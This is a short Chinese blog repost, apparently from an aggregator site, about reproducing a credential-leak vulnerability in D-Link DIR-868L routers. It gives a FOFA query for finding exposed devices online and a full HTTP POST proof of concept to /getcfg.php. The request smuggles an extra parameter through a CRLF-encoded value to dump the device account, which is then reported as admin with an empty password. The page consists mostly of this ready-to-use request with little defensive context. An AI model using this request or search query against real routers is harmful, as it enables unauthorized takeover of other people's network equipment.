漏洞复现-某路由器账号密码泄露
Posted 蓝银花
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了漏洞复现-某路由器账号密码泄露相关的知识,希望对你有一定的参考价值。
漏洞简介:
D-Link 成立于 1986 年,创立至今三十年,凭借其完整多元的产品线以及优异且屡获国际奖项肯定的网络产品和服务,友讯科技已然成为年营收总值超过十亿美元的国际知名企业。 D-Link 在快速、竞争和不断发展的环境中,将持续提供高效能的网络解决方案协助消费者及各类型企业用户。近期网上爆出D-Link-Dir设备存在账号密码泄露漏洞!
FOFA语句:
app="D_Link-DIR-868L"
漏洞POC:
1 POST /getcfg.php HTTP/1.1 2 Host: xxxxxxxx 3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 5 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 6 Connection: close 7 Cookie: uid=XFOB50sMqS 8 Upgrade-Insecure-Requests: 1 9 Content-Type:application/x-www-form-urlencoded 10 Content-Length: 61 11 12 SERVICES=DEVICE.ACCOUNT&attack=ture%0D%0AAUTHORIZED_GROUP%3D1
修改数据包测试,用户Admin,密码空的
登录测试,(⊙o⊙)…,看不懂的语言
以上是关于漏洞复现-某路由器账号密码泄露的主要内容,如果未能解决你的问题,请参考以下文章
泛微e-cology OA系统某接口存在数据库配置信息泄露漏洞复现